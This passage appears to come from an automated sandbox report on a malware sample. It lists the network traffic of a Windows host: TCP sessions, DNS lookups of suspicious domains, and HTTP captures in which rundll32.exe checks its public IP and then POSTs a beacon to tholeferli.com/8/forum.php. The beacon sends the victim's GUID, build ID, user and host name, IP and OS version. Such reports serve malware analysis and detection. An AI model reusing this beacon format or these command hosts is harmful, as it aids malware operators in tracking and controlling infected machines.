Jul 22, 2021 16:12:36.290461063 CEST  49351  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.291343927 CEST  49351  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.344525099 CEST  80  49351  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.460500956 CEST  80  49351  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.460578918 CEST  49351  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.672662020 CEST  49351  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.673681021 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.724837065 CEST  80  49351  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.724971056 CEST  49351  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.725895882 CEST  80  49352  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.726018906 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.727144957 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:36.781388044 CEST  80  49352  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.894742012 CEST  80  49352  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:36.894848108 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.285732985 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.286758900 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.338144064 CEST  80  49352  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:37.338274956 CEST  49352  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.339209080 CEST  80  49353  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:37.339376926 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.342535019 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:37.395309925 CEST  80  49353  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:37.501259089 CEST  80  49353  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:37.502389908 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.058120966 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.059247017 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.110861063 CEST  80  49353  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.110939980 CEST  49353  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.111983061 CEST  80  49354  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.112090111 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.112885952 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.165004969 CEST  80  49354  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.268619061 CEST  80  49354  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.268867016 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.514978886 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.516073942 CEST  49355  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.568197966 CEST  80  49354  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.568280935 CEST  49354  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.568754911 CEST  80  49355  194.147.115.74  192.168.2.22
Jul 22, 2021 16:12:38.568916082 CEST  49355  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.569412947 CEST  49355  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:12:38.622412920 CEST  80  49355  194.147.115.74  192.168.2.22
                                                Jul 22, 2021 16:12:38.741261005 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:38.741333961 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.982099056 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:38.983536959 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.034728050 CEST8049355194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:39.034831047 CEST4935580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.035532951 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:39.036401987 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.036431074 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:39.090308905 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.207247019 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.207441092 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.444874048 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.445635080 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.499068975 CEST8049356194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.499311924 CEST4935680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.499774933 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.499865055 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.500648022 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.552774906 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.669029951 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.669164896 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.888046026 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.889691114 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.940288067 CEST8049357194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.940469980 CEST4935780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.941852093 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:40.942074060 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.945125103 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:40.997324944 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.113933086 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.114428997 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.347208023 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.348275900 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.400002003 CEST8049358194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.400090933 CEST4935880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.400600910 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.400686979 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.403152943 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.456309080 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.561014891 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.561269999 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.781958103 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.784185886 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.834460974 CEST8049359194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.834645033 CEST4935980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.836342096 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.838529110 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.838561058 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:41.891588926 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.995012045 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:41.995270014 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.212312937 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.213701963 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.264738083 CEST8049360194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.265153885 CEST4936080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.265913010 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.266227961 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.266980886 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.319293022 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.422451019 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.422637939 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.652498007 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.653662920 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.706551075 CEST8049361194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.706748962 CEST4936180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.707051992 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.707259893 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.708059072 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:42.760246038 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.866810083 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:42.867047071 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.087609053 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.088988066 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.139982939 CEST8049362194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.140100002 CEST4936280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.141057014 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.141207933 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.142509937 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.194612026 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.311347008 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.312232018 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.537765026 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.538798094 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.590450048 CEST8049363194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.590605021 CEST4936380192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.591573000 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.591691971 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.592484951 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.644747972 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.759109974 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:43.759407043 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.976574898 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:43.977813959 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.029335976 CEST8049364194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.029515028 CEST4936480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.029937029 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.030117989 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.030925989 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.082988977 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.500493050 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.500722885 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.727790117 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.729096889 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.780184031 CEST8049365194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.780308962 CEST4936580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.781372070 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:44.781470060 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.782286882 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:44.836709023 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.254894972 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.255105972 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.537681103 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.539206982 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.590153933 CEST8049366194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.591068029 CEST4936680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.594995022 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.595072985 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.595802069 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.647969961 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.752193928 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:45.752473116 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.973026037 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:45.974572897 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.025496960 CEST8049367194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.025619030 CEST4936780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.028120041 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.028249025 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.029088974 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.081290960 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.481442928 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.481722116 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.705471992 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.706924915 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.759773016 CEST8049368194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.759804010 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.759850979 CEST4936880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.759921074 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.760914087 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:46.812992096 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.929050922 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:46.929282904 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.140719891 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.141725063 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.193407059 CEST8049369194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.193540096 CEST4936980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.193780899 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.193871021 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.194482088 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.246736050 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.664597988 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.665174961 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.904573917 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.904663086 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.957787037 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.958041906 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.959105015 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:47.959284067 CEST8049370194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:47.959391117 CEST4937080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.012670994 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.116082907 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.116338968 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.341614008 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.342657089 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.395771980 CEST8049371194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.395852089 CEST4937180192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.396903038 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:48.396991968 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.397820950 CEST4937280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:12:48.449985981 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:49.555432081 CEST8049372194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:12:49.555520058 CEST4937280192.168.2.22194.147.115.74

                                                UDP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jul 22, 2021 16:11:03.349525928 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:03.400099039 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:03.917808056 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:03.976232052 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:04.258375883 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:04.316255093 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:04.316937923 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:04.374874115 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:05.833621025 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:05.885163069 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:06.360281944 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:06.417241096 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
                                                Jul 22, 2021 16:11:07.855999947 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jul 22, 2021 16:11:07.916183949 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22

                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Jul 22, 2021 16:11:03.349525928 CEST | 192.168.2.22 | 8.8.8.8 | 0x8e4a | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.917808056 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ada | Standard query (0) | tholeferli.com | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:04.258375883 CEST | 192.168.2.22 | 8.8.8.8 | 0xd517 | Standard query (0) | s0lom0n.ru | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:04.316937923 CEST | 192.168.2.22 | 8.8.8.8 | 0xd517 | Standard query (0) | s0lom0n.ru | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.833621025 CEST | 192.168.2.22 | 8.8.8.8 | 0x260d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:06.360281944 CEST | 192.168.2.22 | 8.8.8.8 | 0x98df | Standard query (0) | pospvisis.com | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:07.855999947 CEST | 192.168.2.22 | 8.8.8.8 | 0x84b4 | Standard query (0) | pospvisis.com | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.88.121 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.19.92.227 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.224.49 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.165.85 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.168.151 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.173.155 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.246.238 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.400099039 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e4a | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.216.118 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:03.976232052 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ada | No error (0) | tholeferli.com | | 194.147.115.74 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:04.316255093 CEST | 8.8.8.8 | 192.168.2.22 | 0xd517 | No error (0) | s0lom0n.ru | | 8.211.241.0 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:04.374874115 CEST | 8.8.8.8 | 192.168.2.22 | 0xd517 | No error (0) | s0lom0n.ru | | 8.211.241.0 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.239.65 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.238.218 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.19.92.227 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.136.132 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.78.40 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.224.49 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.121.178 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST | 8.8.8.8 | 192.168.2.22 | 0x260d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.245.108 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:06.417241096 CEST | 8.8.8.8 | 192.168.2.22 | 0x98df | No error (0) | pospvisis.com | | 95.213.179.67 | A (IP address) | IN (0x0001)
                                                Jul 22, 2021 16:11:07.916183949 CEST | 8.8.8.8 | 192.168.2.22 | 0x84b4 | No error (0) | pospvisis.com | | 95.213.179.67 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • api.ipify.org
                                                • tholeferli.com
                                                • s0lom0n.ru

                                                HTTP Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.22 | 49167 | 54.235.88.121 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:03.589586973 CEST | 0 | OUT | GET / HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: api.ipify.org
                                                Cache-Control: no-cache
                                                Jul 22, 2021 16:11:03.760507107 CEST | 1 | IN | HTTP/1.1 200 OK
                                                Server: Cowboy
                                                Connection: keep-alive
                                                Content-Type: text/plain
                                                Vary: Origin
                                                Date: Thu, 22 Jul 2021 14:11:03 GMT
                                                Content-Length: 10
                                                Via: 1.1 vegur
                                                Data Raw: 38 34 2e 31 37 2e 35 32 2e 38
                                                Data Ascii: 84.17.52.8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                1 | 192.168.2.22 | 49168 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:04.034487963 CEST | 1 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:04.203983068 CEST | 2 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
